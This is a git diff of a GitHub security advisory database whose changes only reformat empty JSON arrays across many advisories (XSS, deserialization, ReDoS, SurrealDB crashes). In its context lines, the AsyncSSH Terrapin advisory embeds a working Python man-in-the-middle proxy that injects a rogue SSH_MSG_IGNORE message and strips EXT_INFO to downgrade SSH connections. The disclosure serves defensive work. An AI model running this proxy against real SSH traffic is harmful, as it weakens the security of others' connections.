diff --git a/advisories/github-reviewed/2017/10/GHSA-8qrh-h9m2-5fvf/GHSA-8qrh-h9m2-5fvf.json b/advisories/github-reviewed/2017/10/GHSA-8qrh-h9m2-5fvf/GHSA-8qrh-h9m2-5fvf.json
index 003d97b832f..10fb7f394d0 100644
--- a/advisories/github-reviewed/2017/10/GHSA-8qrh-h9m2-5fvf/GHSA-8qrh-h9m2-5fvf.json
+++ b/advisories/github-reviewed/2017/10/GHSA-8qrh-h9m2-5fvf/GHSA-8qrh-h9m2-5fvf.json
@@ -8,9 +8,7 @@
],
"summary": "Cross site scripting that affects rails",
"details": "Cross-site scripting (XSS) vulnerability in Ruby on Rails 2.x before 2.2.3, and 2.3.x before 2.3.4, allows remote attackers to inject arbitrary web script or HTML by placing malformed Unicode strings into a form helper.",
- "severity": [
-
- ],
+ "severity": [],
"affected": [
{
"package": {
diff --git a/advisories/github-reviewed/2020/08/GHSA-r587-7jh2-4qr3/GHSA-r587-7jh2-4qr3.json b/advisories/github-reviewed/2020/08/GHSA-r587-7jh2-4qr3/GHSA-r587-7jh2-4qr3.json
index ecf927134a0..1b00370beae 100644
--- a/advisories/github-reviewed/2020/08/GHSA-r587-7jh2-4qr3/GHSA-r587-7jh2-4qr3.json
+++ b/advisories/github-reviewed/2020/08/GHSA-r587-7jh2-4qr3/GHSA-r587-7jh2-4qr3.json
@@ -3,14 +3,10 @@
"id": "GHSA-r587-7jh2-4qr3",
"modified": "2022-09-09T20:56:50Z",
"published": "2020-08-26T19:32:50Z",
- "aliases": [
-
- ],
+ "aliases": [],
"summary": "Server secret was included in static assets and served to clients",
"details": "### Impact\nServer JWT signing secret was included in static assets and served to clients.\n\nThis ALLOWS Flood's builtin authentication to be bypassed. Given Flood is granted access to rTorrent's SCGI interface (which is unprotected and ALLOWS arbitrary code execution) and usually wide-ranging privileges to files, along with Flood's lack of security controls against authenticated users, the severity of this vulnerability is **CRITICAL**. \n\n### Background\nCommit 8d11640b imported `config.js` to client (frontend) components to get `disableUsersAndAuth` configuration variable. Subsequently contents of `config.js` are compiled into static assets and served to users. Unfortunately `config.js` also includes `secret`.\n\nIntruders can use `secret` to sign authentication tokens themselves to bypass builtin access control of Flood.\n\n### Patches\nCommit 042cb4ce removed imports of `config.js` from client (frontend) components. Additionally an eslint rule was added to prevent config.js from being imported to client (frontend) components.\n\nCommit 103f53c8 provided a general mitigation to this kind of problem by searching static assets to ensure `secret` is not included before starting server (backend). \n\n### Workarounds\nUsers shall upgrade if they use Flood's builtin authentication system.\n\nWhile maintainers will do their best to support it, Flood cannot guarantee its in-house access control system can stand against determined attackers in high-stake environments. \n\n> Use `HTTP Basic Auth` or other battle-hardened authentication methods instead of Flood's in-house one. You can use `disableUsersAndAuth` to avoid duplicate authentication.\n\nUsers are advised to check out the [wiki](https://github.com/jesec/flood/wiki) for more information on security precautions.\n\n### References\n[Wiki - Security precautions](https://github.com/jesec/flood/wiki/Security-precautions)\n\n[Introduction to JSON Web Tokens](https://jwt.io/introduction/)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [issue tracker](https://github.com/jesec/flood/issues)\n* Email us at [jc@linux.com](mailto:jc@linux.com)",
- "severity": [
-
- ],
+ "severity": [],
"affected": [
{
"package": {
@@ -51,9 +47,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "CRITICAL",
"github_reviewed": true,
"github_reviewed_at": "2020-08-26T19:32:37Z",
diff --git a/advisories/github-reviewed/2022/05/GHSA-6xc7-4cx8-j3xc/GHSA-6xc7-4cx8-j3xc.json b/advisories/github-reviewed/2022/05/GHSA-6xc7-4cx8-j3xc/GHSA-6xc7-4cx8-j3xc.json
index dff00aea97a..d2454e7e3b2 100644
--- a/advisories/github-reviewed/2022/05/GHSA-6xc7-4cx8-j3xc/GHSA-6xc7-4cx8-j3xc.json
+++ b/advisories/github-reviewed/2022/05/GHSA-6xc7-4cx8-j3xc/GHSA-6xc7-4cx8-j3xc.json
@@ -74,9 +74,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2024-04-29T14:25:02Z",
diff --git a/advisories/github-reviewed/2022/05/GHSA-7wx3-vr2f-6p29/GHSA-7wx3-vr2f-6p29.json b/advisories/github-reviewed/2022/05/GHSA-7wx3-vr2f-6p29/GHSA-7wx3-vr2f-6p29.json
index 1c52b043ed0..0167ee6a2cc 100644
--- a/advisories/github-reviewed/2022/05/GHSA-7wx3-vr2f-6p29/GHSA-7wx3-vr2f-6p29.json
+++ b/advisories/github-reviewed/2022/05/GHSA-7wx3-vr2f-6p29/GHSA-7wx3-vr2f-6p29.json
@@ -58,9 +58,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2024-04-30T08:51:21Z",
diff --git a/advisories/github-reviewed/2022/05/GHSA-c9gx-27hq-wcvj/GHSA-c9gx-27hq-wcvj.json b/advisories/github-reviewed/2022/05/GHSA-c9gx-27hq-wcvj/GHSA-c9gx-27hq-wcvj.json
index 5cd32fdcb39..d73c5537ca8 100644
--- a/advisories/github-reviewed/2022/05/GHSA-c9gx-27hq-wcvj/GHSA-c9gx-27hq-wcvj.json
+++ b/advisories/github-reviewed/2022/05/GHSA-c9gx-27hq-wcvj/GHSA-c9gx-27hq-wcvj.json
@@ -8,9 +8,7 @@
],
"summary": "Apache ActiveMQ Cross-site scripting (XSS) vulnerability in the Portfolio publisher servlet ",
"details": "Cross-site scripting (XSS) vulnerability in the Portfolio publisher servlet in the demo web application in Apache ActiveMQ before 5.9.0 allows remote attackers to inject arbitrary web script or HTML via the refresh parameter to demo/portfolioPublish, a different vulnerability than CVE-2012-6092.",
- "severity": [
-
- ],
+ "severity": [],
"affected": [
{
"package": {
diff --git a/advisories/github-reviewed/2022/05/GHSA-h3j8-fr5q-8rfr/GHSA-h3j8-fr5q-8rfr.json b/advisories/github-reviewed/2022/05/GHSA-h3j8-fr5q-8rfr/GHSA-h3j8-fr5q-8rfr.json
index de087c37eec..c1043c64ac5 100644
--- a/advisories/github-reviewed/2022/05/GHSA-h3j8-fr5q-8rfr/GHSA-h3j8-fr5q-8rfr.json
+++ b/advisories/github-reviewed/2022/05/GHSA-h3j8-fr5q-8rfr/GHSA-h3j8-fr5q-8rfr.json
@@ -8,9 +8,7 @@
],
"summary": "JFinal Java Deserialization Vulnerability",
"details": "In applications using jfinal 4.9.08 and below, there is a deserialization vulnerability when using redis which can lead to remote code execution",
- "severity": [
-
- ],
+ "severity": [],
"affected": [
{
"package": {
diff --git a/advisories/github-reviewed/2022/05/GHSA-jr9m-v5qh-mh2j/GHSA-jr9m-v5qh-mh2j.json b/advisories/github-reviewed/2022/05/GHSA-jr9m-v5qh-mh2j/GHSA-jr9m-v5qh-mh2j.json
index 87b5916cf47..10d0f9e5c1e 100644
--- a/advisories/github-reviewed/2022/05/GHSA-jr9m-v5qh-mh2j/GHSA-jr9m-v5qh-mh2j.json
+++ b/advisories/github-reviewed/2022/05/GHSA-jr9m-v5qh-mh2j/GHSA-jr9m-v5qh-mh2j.json
@@ -116,9 +116,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2024-04-08T18:54:13Z",
diff --git a/advisories/github-reviewed/2022/05/GHSA-mfhr-3xmc-r2gg/GHSA-mfhr-3xmc-r2gg.json b/advisories/github-reviewed/2022/05/GHSA-mfhr-3xmc-r2gg/GHSA-mfhr-3xmc-r2gg.json
index 7cfe4612dfc..12dac570ccc 100644
--- a/advisories/github-reviewed/2022/05/GHSA-mfhr-3xmc-r2gg/GHSA-mfhr-3xmc-r2gg.json
+++ b/advisories/github-reviewed/2022/05/GHSA-mfhr-3xmc-r2gg/GHSA-mfhr-3xmc-r2gg.json
@@ -8,9 +8,7 @@
],
"summary": "Improper Neutralization of Input During Web Page Generation in Apache ActiveMQ",
"details": "Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the \"cron of a message.\"",
- "severity": [
-
- ],
+ "severity": [],
"affected": [
{
"package": {
diff --git a/advisories/github-reviewed/2023/06/GHSA-6643-h7h5-x9wh/GHSA-6643-h7h5-x9wh.json b/advisories/github-reviewed/2023/06/GHSA-6643-h7h5-x9wh/GHSA-6643-h7h5-x9wh.json
index d07a4748fad..4372481f835 100644
--- a/advisories/github-reviewed/2023/06/GHSA-6643-h7h5-x9wh/GHSA-6643-h7h5-x9wh.json
+++ b/advisories/github-reviewed/2023/06/GHSA-6643-h7h5-x9wh/GHSA-6643-h7h5-x9wh.json
@@ -70,9 +70,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "CRITICAL",
"github_reviewed": true,
"github_reviewed_at": "2023-06-21T22:09:21Z",
diff --git a/advisories/github-reviewed/2023/06/GHSA-xp5h-f8jf-rc8q/GHSA-xp5h-f8jf-rc8q.json b/advisories/github-reviewed/2023/06/GHSA-xp5h-f8jf-rc8q/GHSA-xp5h-f8jf-rc8q.json
index f4e83274d83..0c4d2771ca5 100644
--- a/advisories/github-reviewed/2023/06/GHSA-xp5h-f8jf-rc8q/GHSA-xp5h-f8jf-rc8q.json
+++ b/advisories/github-reviewed/2023/06/GHSA-xp5h-f8jf-rc8q/GHSA-xp5h-f8jf-rc8q.json
@@ -8,9 +8,7 @@
],
"summary": "rails-ujs vulnerable to DOM Based Cross-site Scripting contenteditable HTML Elements",
"details": "NOTE: rails-ujs is part of Rails/actionview since 5.1.0.\n\nThere is a potential DOM based cross-site scripting issue in rails-ujs\nwhich leverages the Clipboard API to target HTML elements that are\nassigned the contenteditable attribute. This has the potential to\noccur when pasting malicious HTML content from the clipboard that\nincludes a data-method, data-remote or data-disable-with attribute.\n\nThis vulnerability has been assigned the CVE identifier CVE-2023-23913.\n\nNot affected: < 5.1.0\nVersions Affected: >= 5.1.0\nFixed Versions: 6.1.7.3, 7.0.4.3\n\nImpact\n If the specified malicious HTML clipboard content is provided to a\n contenteditable element, this could result in the arbitrary execution\n of javascript on the origin in question.\n\nReleases\n The FIXED releases are available at the normal locations.\n\nWorkarounds\n We recommend that all users upgrade to one of the FIXED versions.\n In the meantime, users can attempt to mitigate this vulnerability\n by removing the contenteditable attribute from elements in pages\n that rails-ujs will interact with.\n\nPatches\n To aid users who aren’t able to upgrade immediately we have provided\n patches for the two supported release series. They are in git-am\n format and consist of a single changeset.\n\n* rails-ujs-data-method-contenteditable-6-1.patch - Patch for 6.1 series\n* rails-ujs-data-method-contenteditable-7-0.patch - Patch for 7.0 series\n\nPlease note that only the 7.0.Z and 6.1.Z series are\nsupported at present, and 6.0.Z for severe vulnerabilities.\n\nUsers of earlier unsupported releases are advised to upgrade as\nsoon as possible as we cannot guarantee the continued availability\nof security fixes for unsupported releases.\n\nCredits\n We would like to thank ryotak 15 for reporting this!\n\n* rails-ujs-data-method-contenteditable-6-1.patch (8.5 KB)\n* rails-ujs-data-method-contenteditable-7-0.patch (8.5 KB)\n* rails-ujs-data-method-contenteditable-main.patch (8.9 KB)\n",
- "severity": [
-
- ],
+ "severity": [],
"affected": [
{
"package": {
diff --git a/advisories/github-reviewed/2023/12/GHSA-hfmc-7525-mj55/GHSA-hfmc-7525-mj55.json b/advisories/github-reviewed/2023/12/GHSA-hfmc-7525-mj55/GHSA-hfmc-7525-mj55.json
index 9d9aeee37fd..05f2c2fc852 100644
--- a/advisories/github-reviewed/2023/12/GHSA-hfmc-7525-mj55/GHSA-hfmc-7525-mj55.json
+++ b/advisories/github-reviewed/2023/12/GHSA-hfmc-7525-mj55/GHSA-hfmc-7525-mj55.json
@@ -3,9 +3,7 @@
"id": "GHSA-hfmc-7525-mj55",
"modified": "2023-12-19T17:22:31Z",
"published": "2023-12-18T19:21:45Z",
- "aliases": [
-
- ],
+ "aliases": [],
"summary": "AsyncSSH vulnerable to Prefix Truncation Attack (a.k.a. Terrapin Attack) against ChaCha20-Poly1305 and Encrypt-then-MAC",
"details": "### Summary\n\nAsyncSSH v2.14.1 and earlier is vulnerable to a novel prefix truncation attack (a.k.a. Terrapin attack), which allows a man-in-the-middle attacker to strip an arbitrary number of messages right after the initial key exchange, breaking SSH extension negotiation (RFC8308) in the process and thus downgrading connection security.\n\n### Mitigations\n\nTo mitigate this protocol vulnerability, OpenSSH suggested a so-called \"strict kex\" which alters the SSH handshake to ensure a Man-in-the-Middle attacker cannot introduce unauthenticated messages as well as convey sequence number manipulation across handshakes. Support for strict key exchange has been added to AsyncSSH in the patched version. \n\n**Warning: To take effect, both the client and server must support this countermeasure.** \n\nAs a stop-gap measure, peers may also (temporarily) disable the affected algorithms and use unaffected alternatives like AES-GCM instead until patches are available.\n\n### Details\n\nThe SSH specifications of ChaCha20-Poly1305 (`chacha20-poly1305@openssh.com`) and Encrypt-then-MAC (`*-etm@openssh.com` MACs) are vulnerable against an arbitrary prefix truncation attack (a.k.a. Terrapin attack). This allows for an extension negotiation downgrade by stripping the SSH_MSG_EXT_INFO sent after the first message after SSH_MSG_NEWKEYS, downgrading security, and disabling attack countermeasures in some versions of OpenSSH. When targeting Encrypt-then-MAC, this attack requires the use of a CBC cipher to be practically exploitable due to the internal workings of the cipher mode. Additionally, this novel attack technique can be used to exploit previously unexploitable implementation flaws in a Man-in-the-Middle scenario.\n\nThe attack works by an attacker injecting an arbitrary number of SSH_MSG_IGNORE messages during the initial key exchange and consequently removing the same number of messages just after the initial key exchange has concluded. This is possible due to missing authentication of the excess SSH_MSG_IGNORE messages and the fact that the implicit sequence numbers used within the SSH protocol are only checked after the initial key exchange.\n\nIn the case of ChaCha20-Poly1305, the attack is guaranteed to work on every connection as this cipher does not maintain an internal state other than the message's sequence number. In the case of Encrypt-Then-MAC, practical exploitation requires the use of a CBC cipher; while theoretical integrity is broken for all ciphers when using this mode, message processing will fail at the application layer for CTR and stream ciphers.\n\nFor more details and a pre-print of the associated research paper, see [https://terrapin-attack.com](https://terrapin-attack.com). This website is not affiliated with AsyncSSH in any way.\n\n### PoC\n\n\n Extension Negotiation Downgrade Attack (chacha20-poly1305@openssh.com)
\n \n ```python\n#!/usr/bin/python3\nimport socket\nfrom binascii import unhexlify\nfrom threading import Thread\nfrom time import sleep\n\n#####################################################################################\n## Proof of Concept for the extension downgrade attack ##\n## ##\n## Variant: ChaCha20-Poly1305 ##\n## ##\n## Client(s) tested: OpenSSH 9.5p1 / PuTTY 0.79 ##\n## Server(s) tested: OpenSSH 9.5p1 ##\n## ##\n## Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 ##\n#####################################################################################\n\n# IP and port for the TCP proxy to bind to\nPROXY_IP = '127.0.0.1'\nPROXY_PORT = 2222\n\n# IP and port of the server\nSERVER_IP = '127.0.0.1'\nSERVER_PORT = 22\n\nLENGTH_FIELD_LENGTH = 4\n\ndef pipe_socket_stream(in_socket, out_socket):\n try:\n while True:\n data = in_socket.recv(4096)\n if len(data) == 0:\n break\n out_socket.send(data)\n except ConnectionResetError:\n print(\"[!] Socket connection has been reset. Closing sockets.\")\n except OSError:\n print(\"[!] Sockets closed by another thread. Terminating pipe_socket_stream thread.\")\n in_socket.close()\n out_socket.close()\n\nrogue_msg_ignore = unhexlify('0000000C060200000000000000000000')\ndef perform_attack(client_socket, server_socket):\n # Version exchange\n client_vex = client_socket.recv(255)\n server_vex = server_socket.recv(255)\n client_socket.send(server_vex)\n server_socket.send(client_vex)\n # SSH_MSG_KEXINIT\n client_kexinit = client_socket.recv(35000)\n server_kexinit = server_socket.recv(35000)\n client_socket.send(server_kexinit)\n server_socket.send(client_kexinit)\n # Client will now send the key exchange INIT\n client_kex_init = client_socket.recv(35000)\n server_socket.send(client_kex_init)\n # Insert ignore message (to client)\n client_socket.send(rogue_msg_ignore)\n # Wait half a second here to avoid missing EXT_INFO\n # Can be solved by counting bytes as well\n sleep(0.5)\n # KEX_REPLY / NEW_KEYS / EXT_INFO\n server_response = server_socket.recv(35000)\n # Strip EXT_INFO before forwarding server_response to client\n # Length fields of KEX_REPLY and NEW_KEYS are still unencrypted\n server_kex_reply_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[:LENGTH_FIELD_LENGTH])\n server_newkeys_start = server_kex_reply_length\n server_newkeys_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[server_newkeys_start:server_newkeys_start + LENGTH_FIELD_LENGTH])\n server_extinfo_start = server_newkeys_start + server_newkeys_length\n client_socket.send(server_response[:server_extinfo_start])\n\nif __name__ == '__main__':\n print(\"--- Proof of Concept for extension downgrade attack (ChaCha20-Poly1305) ---\")\n mitm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n mitm_socket.bind((PROXY_IP, PROXY_PORT))\n mitm_socket.listen(5)\n\n print(f\"[+] MitM Proxy started. Listening on {(PROXY_IP, PROXY_PORT)} for incoming connections...\")\n try:\n while True:\n client_socket, client_addr = mitm_socket.accept()\n print(f\"[+] Accepted connection from: {client_addr}\")\n print(f\"[+] Establishing new target connection to {(SERVER_IP, SERVER_PORT)}.\")\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_socket.connect((SERVER_IP, SERVER_PORT))\n print(\"[+] Performing extension downgrade\")\n perform_attack(client_socket, server_socket)\n print(\"[+] Downgrade performed. Spawning new forwarding threads to handle client connection from now on.\")\n forward_client_to_server_thread = Thread(target=pipe_socket_stream, args=(client_socket, server_socket), daemon=True)\n forward_client_to_server_thread.start()\n forward_server_to_client_thread = Thread(target=pipe_socket_stream, args=(server_socket, client_socket), daemon=True)\n forward_server_to_client_thread.start()\n except KeyboardInterrupt:\n client_socket.close()\n server_socket.close()\n mitm_socket.close()\n ```\n \n\n### Impact\n\nThis attack targets the specification of ChaCha20-Poly1305 (`chacha20-poly1305@openssh.com`) and Encrypt-then-MAC (`*-etm@openssh.com`), which are widely adopted by well-known SSH implementations and can be considered de-facto standard. These algorithms can be practically exploited; however, in the case of Encrypt-Then-MAC, we additionally require the use of a CBC cipher. As a consequence, this attack works against all well-behaving SSH implementations supporting either of those algorithms and can be used to downgrade (but not fully strip) connection security in case SSH extension negotiation (RFC8308) is supported. The attack may also enable attackers to exploit certain implementation flaws in a man-in-the-middle (MitM) scenario.",
"severity": [
diff --git a/advisories/github-reviewed/2024/01/GHSA-9h6g-pr28-7cqp/GHSA-9h6g-pr28-7cqp.json b/advisories/github-reviewed/2024/01/GHSA-9h6g-pr28-7cqp/GHSA-9h6g-pr28-7cqp.json
index 5e46639db3f..972905678f0 100644
--- a/advisories/github-reviewed/2024/01/GHSA-9h6g-pr28-7cqp/GHSA-9h6g-pr28-7cqp.json
+++ b/advisories/github-reviewed/2024/01/GHSA-9h6g-pr28-7cqp/GHSA-9h6g-pr28-7cqp.json
@@ -3,9 +3,7 @@
"id": "GHSA-9h6g-pr28-7cqp",
"modified": "2024-01-31T22:42:54Z",
"published": "2024-01-31T22:42:54Z",
- "aliases": [
-
- ],
+ "aliases": [],
"summary": "nodemailer ReDoS when trying to send a specially crafted email",
"details": "### Summary\nA ReDoS vulnerability occurs when nodemailer tries to parse img files with the parameter `attachDataUrls` set, causing the stuck of event loop. \nAnother flaw was found when nodemailer tries to parse an attachments with a embedded file, causing the stuck of event loop. \n\n### Details\n\nRegex: /^data:((?:[^;]*;)*(?:[^,]*)),(.*)$/\n\nPath: compile -> getAttachments -> _processDataUrl\n\nRegex: /(
]* src\\s*=[\\s\"']*)(data:([^;]+);[^\"'>\\s]+)/\n\nPath: _convertDataImages\n\n### PoC\n\nhttps://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6\nhttps://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698\n\n### Impact\n\nReDoS causes the event loop to stuck a specially crafted evil email can cause this problem.\n",
"severity": [
diff --git a/advisories/github-reviewed/2024/02/GHSA-3rxx-8f33-7p6p/GHSA-3rxx-8f33-7p6p.json b/advisories/github-reviewed/2024/02/GHSA-3rxx-8f33-7p6p/GHSA-3rxx-8f33-7p6p.json
index 09316fa113e..381e1a04d0e 100644
--- a/advisories/github-reviewed/2024/02/GHSA-3rxx-8f33-7p6p/GHSA-3rxx-8f33-7p6p.json
+++ b/advisories/github-reviewed/2024/02/GHSA-3rxx-8f33-7p6p/GHSA-3rxx-8f33-7p6p.json
@@ -81,9 +81,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": true,
"github_reviewed_at": "2024-02-29T20:10:02Z",
diff --git a/advisories/github-reviewed/2024/02/GHSA-45m2-8q7f-93wv/GHSA-45m2-8q7f-93wv.json b/advisories/github-reviewed/2024/02/GHSA-45m2-8q7f-93wv/GHSA-45m2-8q7f-93wv.json
index 9e81c2c301f..b05fa3fea0a 100644
--- a/advisories/github-reviewed/2024/02/GHSA-45m2-8q7f-93wv/GHSA-45m2-8q7f-93wv.json
+++ b/advisories/github-reviewed/2024/02/GHSA-45m2-8q7f-93wv/GHSA-45m2-8q7f-93wv.json
@@ -58,9 +58,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": true,
"github_reviewed_at": "2024-02-29T20:10:18Z",
diff --git a/advisories/github-reviewed/2024/02/GHSA-5jjq-8cvj-v6m9/GHSA-5jjq-8cvj-v6m9.json b/advisories/github-reviewed/2024/02/GHSA-5jjq-8cvj-v6m9/GHSA-5jjq-8cvj-v6m9.json
index 1e8f2f08453..edbfe603695 100644
--- a/advisories/github-reviewed/2024/02/GHSA-5jjq-8cvj-v6m9/GHSA-5jjq-8cvj-v6m9.json
+++ b/advisories/github-reviewed/2024/02/GHSA-5jjq-8cvj-v6m9/GHSA-5jjq-8cvj-v6m9.json
@@ -8,9 +8,7 @@
],
"summary": "Cross-site Scripting in Serenity",
"details": "Serenity before 6.8.0 allows XSS via an email link because LoginPage.tsx permits return URLs that do not begin with a / character.",
- "severity": [
-
- ],
+ "severity": [],
"affected": [
{
"package": {
diff --git a/advisories/github-reviewed/2024/02/GHSA-6wr5-jmpr-mjcx/GHSA-6wr5-jmpr-mjcx.json b/advisories/github-reviewed/2024/02/GHSA-6wr5-jmpr-mjcx/GHSA-6wr5-jmpr-mjcx.json
index e2a272680ed..a74f95110ef 100644
--- a/advisories/github-reviewed/2024/02/GHSA-6wr5-jmpr-mjcx/GHSA-6wr5-jmpr-mjcx.json
+++ b/advisories/github-reviewed/2024/02/GHSA-6wr5-jmpr-mjcx/GHSA-6wr5-jmpr-mjcx.json
@@ -3,9 +3,7 @@
"id": "GHSA-6wr5-jmpr-mjcx",
"modified": "2024-02-21T00:03:06Z",
"published": "2024-02-21T00:03:06Z",
- "aliases": [
-
- ],
+ "aliases": [],
"summary": "Uncaught Exception in Macro Expecting Native Function to Exist",
"details": "The query executor would panic when executing a query containing a call to a built-in SurrealDB function that did not exist. This could occur accidentally in situations where the version of the SurrealDB client was newer than the SurrealDB server or when a pre-parsed query was provided to the server via a newer version of the SurrealDB SDK.\n\n### Impact\n\nA client that is authorized to run queries in a SurrealDB server is able to craft and execute a pre-parsed query invoking a nonexistent built-in function, which will cause a panic. This will crash the server, leading to denial of service.\n\n### Patches\n\n- Version 1.2.0 and later are not affected by this issue.\n\n### Workarounds\n\nConcerned users unable to update may want to limit the ability of untrusted users to run arbitrary SurrealQL queries in the affected versions of SurrealDB. To limit the impact of the denial of service, SurrealDB administrators may also want to ensure that the SurrealDB process is running so that it can be automatically re-started after a crash.\n\n### References\n\n- #3454\n- https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=65755",
"severity": [
diff --git a/advisories/github-reviewed/2024/02/GHSA-8xff-473h-f863/GHSA-8xff-473h-f863.json b/advisories/github-reviewed/2024/02/GHSA-8xff-473h-f863/GHSA-8xff-473h-f863.json
index 06732455dcc..c37c479005d 100644
--- a/advisories/github-reviewed/2024/02/GHSA-8xff-473h-f863/GHSA-8xff-473h-f863.json
+++ b/advisories/github-reviewed/2024/02/GHSA-8xff-473h-f863/GHSA-8xff-473h-f863.json
@@ -3,9 +3,7 @@
"id": "GHSA-8xff-473h-f863",
"modified": "2024-02-21T00:00:54Z",
"published": "2024-02-21T00:00:54Z",
- "aliases": [
-
- ],
+ "aliases": [],
"summary": "Uncaught Exception Handling Parsing Errors on Line Terminators",
"details": "The span rendering would panic when handling failed parsing of queries where the error occurred on a line terminator character.\n\n### Impact\n\nA client that is authorized to run queries in a SurrealDB server is able to execute a malformed query which will fail to parse on a line terminator character and cause a panic in the span rendering code. This will crash the server, leading to denial of service.\n\n### Patches\n\n- Version 1.2.1 and later are not affected by this issue.\n\n### Workarounds\n\nConcerned users unable to update may want to limit the ability of untrusted users to run arbitrary SurrealQL queries in the affected versions of SurrealDB. To limit the impact of the denial of service, SurrealDB administrators may also want to ensure that the SurrealDB process is running so that it can be automatically re-started after a crash.\n\n### References\n\n- #3527\n- https://github.com/StarlaneStudios/Surrealist/issues/177",
"severity": [
diff --git a/advisories/github-reviewed/2024/02/GHSA-9vx6-7xxf-x967/GHSA-9vx6-7xxf-x967.json b/advisories/github-reviewed/2024/02/GHSA-9vx6-7xxf-x967/GHSA-9vx6-7xxf-x967.json
index 41471c2ac28..aed551a8eb5 100644
--- a/advisories/github-reviewed/2024/02/GHSA-9vx6-7xxf-x967/GHSA-9vx6-7xxf-x967.json
+++ b/advisories/github-reviewed/2024/02/GHSA-9vx6-7xxf-x967/GHSA-9vx6-7xxf-x967.json
@@ -8,9 +8,7 @@
],
"summary": "OpenZeppelin Contracts base64 encoding may read from potentially dirty memory",
"details": "### Impact\n\nThe `Base64.encode` function encodes a `bytes` input by iterating over it in chunks of 3 bytes. When this input is not a multiple of 3, the last iteration may read parts of the memory that are beyond the input buffer.\n\nAlthough the `encode` function pads the output for these cases, up to 4 bits of data are kept between the encoding and padding, corrupting the output if these bits were dirty (i.e. memory after the input is not 0). These conditions are more frequent in the following scenarios:\n\n- A `bytes memory` struct is allocated just after the input and the first bytes of it are non-zero.\n- The memory pointer is set to a non-empty memory location before allocating the input.\n\nDevelopers should evaluate whether the extra bits can be maliciously manipulated by an attacker.\n\n### Patches\n\nUpgrade to 5.0.2 or 4.9.6.\n\n### References\n\nThis issue was reported by the Independent Security Researcher Riley Holterhus through Immunefi (@rileyholterhus on X)",
- "severity": [
-
- ],
+ "severity": [],
"affected": [
{
"package": {
diff --git a/advisories/github-reviewed/2024/02/GHSA-9xxv-q6pp-96wq/GHSA-9xxv-q6pp-96wq.json b/advisories/github-reviewed/2024/02/GHSA-9xxv-q6pp-96wq/GHSA-9xxv-q6pp-96wq.json
index cedf6148c94..effaa0aceb4 100644
--- a/advisories/github-reviewed/2024/02/GHSA-9xxv-q6pp-96wq/GHSA-9xxv-q6pp-96wq.json
+++ b/advisories/github-reviewed/2024/02/GHSA-9xxv-q6pp-96wq/GHSA-9xxv-q6pp-96wq.json
@@ -62,9 +62,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "LOW",
"github_reviewed": true,
"github_reviewed_at": "2024-02-29T20:10:31Z",
diff --git a/advisories/github-reviewed/2024/02/GHSA-ff2w-wm48-jhqj/GHSA-ff2w-wm48-jhqj.json b/advisories/github-reviewed/2024/02/GHSA-ff2w-wm48-jhqj/GHSA-ff2w-wm48-jhqj.json
index 0f82447a416..a870d15b41c 100644
--- a/advisories/github-reviewed/2024/02/GHSA-ff2w-wm48-jhqj/GHSA-ff2w-wm48-jhqj.json
+++ b/advisories/github-reviewed/2024/02/GHSA-ff2w-wm48-jhqj/GHSA-ff2w-wm48-jhqj.json
@@ -8,9 +8,7 @@
],
"summary": "Arbitrary File Read Vulnerability in Apache Dolphinscheduler",
"details": "Arbitrary File Read Vulnerability in Apache Dolphinscheduler.\n\nThis issue affects Apache DolphinScheduler: before 3.2.1. \n\nWe recommend users to upgrade Apache DolphinScheduler to version 3.2.1, which fixes the issue.",
- "severity": [
-
- ],
+ "severity": [],
"affected": [
{
"package": {
diff --git a/advisories/github-reviewed/2024/02/GHSA-q3gg-m8hr-h4x4/GHSA-q3gg-m8hr-h4x4.json b/advisories/github-reviewed/2024/02/GHSA-q3gg-m8hr-h4x4/GHSA-q3gg-m8hr-h4x4.json
index 7a37d630955..37afc61cac1 100644
--- a/advisories/github-reviewed/2024/02/GHSA-q3gg-m8hr-h4x4/GHSA-q3gg-m8hr-h4x4.json
+++ b/advisories/github-reviewed/2024/02/GHSA-q3gg-m8hr-h4x4/GHSA-q3gg-m8hr-h4x4.json
@@ -3,9 +3,7 @@
"id": "GHSA-q3gg-m8hr-h4x4",
"modified": "2024-02-21T00:04:05Z",
"published": "2024-02-21T00:04:05Z",
- "aliases": [
-
- ],
+ "aliases": [],
"summary": "Externally Controlled Format String in Scripting Functions",
